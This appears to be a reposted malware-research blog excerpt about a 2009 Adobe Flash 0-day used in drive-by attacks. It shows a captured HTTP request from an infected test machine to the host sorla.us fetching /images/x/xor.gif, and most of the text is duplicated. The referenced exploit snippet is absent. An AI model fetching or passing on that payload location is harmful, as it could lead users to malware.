The new Flash 0-day has opened multiple avenues for malware authors. In my last article I showed how this vulnerability is being exploited via the PDF reader's support for SWF files. However, this vulnerability can just as easily be exploited in a standard drive-by fashion purely in Flash as well. This is precisely what has started to happen.
Here is the snippet of the javascript which is actively targeting this 0-day vulnerability.
This exploit successfully worked on my VM under Firefox 3.5.1 and Flash player 10. It worked smoothly and just before FireFox crashed, I saw an outbound communication like this:
GET /images/x/xor.gif HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: sorla.us
Connection: Keep-Alive
Here is the snippet of the javascript which is actively targeting this 0-day vulnerability.
This exploit successfully worked on my VM under Firefox 3.5.1 and Flash player 10. It worked smoothly and just before FireFox crashed, I saw an outbound communication like this:
GET /images/x/xor.gif HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: sorla.us
Connection: Keep-Alive
Read more
http://blog.fireeye.com/research/2009/07/who-is-exploiting-the-adobe-flash-0day-part-2.html
No comments:
Post a Comment